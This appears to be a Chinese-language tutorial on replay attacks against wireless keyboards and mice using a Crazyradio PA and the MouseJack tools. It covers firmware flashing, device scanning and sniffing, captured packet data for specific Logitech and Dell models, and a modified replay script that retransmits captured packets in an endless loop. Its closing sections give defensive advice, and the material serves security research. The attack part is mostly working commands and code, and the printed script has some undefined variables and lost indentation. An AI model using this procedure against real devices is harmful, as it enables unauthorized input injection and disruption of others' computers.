无线键鼠重放攻击测试
字数 1211 2025-08-22 12:22:36
无线键鼠重放攻击测试教学文档
1. 前言与背景知识
无线键鼠通常使用2.4GHz ISM频段中的专有协议进行通信。当键鼠产生按键或移动时,会将相应的射频数据包发送到无线接收器,从而与PC通信。本文档将详细介绍如何使用mousejack项目和crazyradio PA无线收发器来分析无线键鼠通信,并实现重放攻击。
2. 所需硬件设备
2.1 测试设备
- 罗技k220无线键鼠
- 罗技k400r无线触控键盘
- Dell KM714无线键鼠
2.2 攻击工具
- crazyradio PA:放大版的USB适配器,通过修改固件可支持伪混杂模式,简化嗅探和注入功能
- 设备ID:1915:7777(原始),1915:0101(烧录后)
3. 环境准备与固件烧录
3.1 安装依赖
sudo apt install sdcc binutils python python-pip
pip install pyusb
pip install platformio
3.2 获取并烧录固件
git clone https://github.com/bitcraze/crazyradio-firmware
cd crazyradio-firmware
修改usbtools/launchBootloader.py中的timeout时间(原脚本设置可能太短)
启动Bootloader:
python usbtools/launchBootloader.py
下载并烧录固件(如cradio-0.53.bin):
python usbtools/nrfbootload.py flash cradio-0.53.bin
烧录成功后重新插拔设备,设备ID应变为1915:0101
4. MouseJack项目安装
MouseJack是一组影响非蓝牙无线鼠标和键盘的安全漏洞项目,影响7家供应商的设备。
4.1 编译安装
git clone --recursive https://github.com/RFStorm/mousejack.git
cd mousejack
make
make install
安装成功后重新插拔设备,ID变为1915:0102
4.2 扩展工具
git clone https://github.com/iamckn/mousejack_transmit
5. 无线键鼠重放攻击流程
5.1 扫描无线设备
cd nrf-research-firmware/tools
sudo python nrf24-scanner.py
示例输出:发现无线鼠标MAC地址为B0:58:31:49:A4
5.2 嗅探特定设备
sudo python nrf24-sniffer.py -a B0:58:31:49:A4
示例嗅探数据:
右键点击
[2019-04-14 19:31:32.972] 32 10 B0:58:31:49:A4 00:C2:02:00:00:00:00:00:00:3C
[2019-04-14 19:31:32.980] 32 10 B0:58:31:49:A4 00:4F:00:00:55:00:00:00:00:5C
右键松开
[2019-04-14 19:31:34.479] 32 10 B0:58:31:49:A4 00:C2:00:00:00:00:00:00:00:3E
[2019-04-14 19:31:34.484] 32 10 B0:58:31:49:A4 00:4F:00:00:55:00:00:00:00:5C
左键点击
[2019-04-14 19:32:35.658] 32 10 B0:58:31:49:A4 00:C2:01:00:00:00:00:00:00:3D
[2019-04-14 19:32:35.666] 32 10 B0:58:31:49:A4 00:4F:00:00:55:00:00:00:00:5C
左键松开
[2019-04-14 19:32:36.699] 32 10 B0:58:31:49:A4 00:C2:00:00:00:00:00:00:00:3E
[2019-04-14 19:32:36.708] 32 10 B0:58:31:49:A4 00:4F:00:00:55:00:00:00:00:5C
5.3 准备重放数据
在tools目录下创建pack.log文件,写入要重放的数据,例如右键点击:
00:C2:02:00:00:00:00:00:00:3C
00:4F:00:00:55:00:00:00:00:5C
00:C2:00:00:00:00:00:00:00:3E
00:4F:00:00:55:00:00:00:00:5C
5.4 修改replay.py脚本
官方脚本可能存在address处理问题,需要修改:
# 原代码(有问题)
try_address = chr(b) + address[1:]
# 修改为
try_address = address[0:]
完整replay.py脚本(关键部分):
#!/usr/bin/env python
'''
This program is changed by nrf24-network-mapper, you can
use this script to replay packets.
'''
import binascii, time
from lib import common
# 初始化参数和无线电
common.init_args('./nrf24-network-mapper.py')
common.parser.add_argument('-a', '--address', type=str, help='Known address', required=True)
common.parser.add_argument('-p', '--passes', type=str, help='Number of passes (default 2)', default=2)
common.parser.add_argument('-k', '--ack_timeout', type=int, help='ACK timeout in microseconds, accepts [250,4000], step 250', default=500)
common.parser.add_argument('-r', '--retries', type=int, help='Auto retry limit, accepts [0,15]', default='5', choices=xrange(0, 16), metavar='RETRIES')
common.parse_and_init()
# 解析地址
address = common.args.address.replace(':', '').decode('hex')[::-1][:5]
address_string = ':'.join('{:02X}'.format(ord(b)) for b in address[::-1])
# 设置无线电为嗅探模式
common.radio.enter_sniffer_mode(address)
# 读取数据包
def ReadPack():
payload = []
for line in open('pack.log'):
payload.append(line)
return payload
# Ping测试
def Ping():
channels_t = []
for p in range(common.args.passes):
for b in range(4):
try_address = address[0:] # 修改后的地址处理
common.radio.enter_sniffer_mode(try_address)
for c in range(len(common.args.channels)):
common.radio.set_channel(common.args.channels[c])
if common.radio.transmit_payload(ping_payload, ack_timeout, retries):
channels_t.append(common.channels[c])
return channels_t
# 发送数据包
def airplay(sendpayload, get_channels, data):
for p in range(common.args.passes):
for b in range(4):
try_address = address[0:]
common.radio.enter_sniffer_mode(try_address)
for c in range(len(get_channels)):
common.radio.set_channel(get_channels[c])
while True: # 无限循环实现重放干扰
if common.radio.transmit_payload(sendpayload, ack_timeout, retries):
print('Sending Payload:'+' '+data)
def run():
get_channels = list(set(Ping()))
payloads = ReadPack()
for payload in payloads:
data = payload.strip('\n')
payload = binascii.a2b_hex(data.replace(':', ''))
airplay(payload, get_channels, data)
if __name__ == '__main__':
run()
5.5 执行重放攻击
sudo python replay.py -a B0:58:31:49:A4
6. 不同设备的测试结果
6.1 罗技k220
- 右键点击数据包:
00:C2:02:00:00:00:00:00:00:3C 00:4F:00:00:55:00:00:00:00:5C - 空格键数据包:
00:D3:1A:EB:F6:4C:3A:4C:77:C7:28:4F:CB:18:00:00:00:00:00:00:00:C8 00:4F:00:00:55:00:00:00:00:5C
6.2 罗技k400r
- 右键数据包:
00:C2:02:00:00:00:00:00:00:3C 00:C2:00:00:00:00:00:00:00:3E - 空格键数据包:
00:D3:86:00:51:75:58:39:C7:00:40:FD:10:72:00:00:00:00:00:00:00:CA 00:D3:9C:F5:7B:D6:B1:5F:FC:08:40:FD:10:73:00:00:00:00:00:00:00:77 00:4F:00:01:18:00:00:00:00:98
6.3 Dell KM714的特殊现象
使用nrf24-network-mapper.py扫描时,键鼠会失效,需重新拔插接收器才能恢复。这可能是设备固件的特殊行为。
7. 防御建议
- 使用加密设备:选择支持加密通信的无线键鼠
- 物理隔离:在敏感环境中使用有线设备
- 固件更新:保持设备固件为最新版本
- 距离限制:将接收器放置在远离潜在攻击者的位置
- 使用蓝牙设备:蓝牙协议通常比专有2.4GHz协议更安全
8. 总结
本文档详细介绍了如何利用crazyradio PA和mousejack项目对无线键鼠进行重放攻击。关键步骤包括:
- 准备硬件环境和烧录固件
- 扫描和嗅探无线键鼠通信
- 捕获和分析数据包
- 修改并执行重放脚本
- 针对不同设备的测试和调整
通过理解这些攻击技术,安全研究人员可以更好地评估和防御无线输入设备的安全风险。